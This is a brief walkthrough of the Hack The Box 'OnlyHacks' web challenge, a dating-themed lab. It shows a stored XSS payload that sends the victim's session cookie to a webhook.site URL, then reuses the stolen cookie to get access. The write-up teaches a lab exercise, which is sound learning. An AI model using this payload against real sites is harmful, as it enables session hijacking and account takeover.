HackTheBox OnlyHacks Challenge

Explore the basics of cybersecurity in the OnlyHacks Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/860

Description

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Exploitation

Register and log in, then navigate to Matches to start a conversation.

Begin the conversation with:

Hello, how are you?

Set up a webhook by obtaining a link from https://webhook.site/ and replace the provided link with your unique one.

Demonstrate an xss by saying:

Hello there `<script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>`

Lastly, paste the captured cookie into the designated page and refresh.

Summary

The OnlyHacks Challenge on Hack The Box is a very-easy web challenge that involves Cross-Site Scripting (XSS) to steal session cookies. Participants register on a dating-themed platform, start a conversation, and inject a malicious JavaScript payload that sends the victim’s session cookie to a controlled webhook endpoint. By capturing and using the stolen cookie, they gain unauthorized access, demonstrating the impact of client-side script injection. The challenge highlights the dangers of improper input sanitization and emphasizes the need for secure handling of user-generated content to prevent XSS attacks.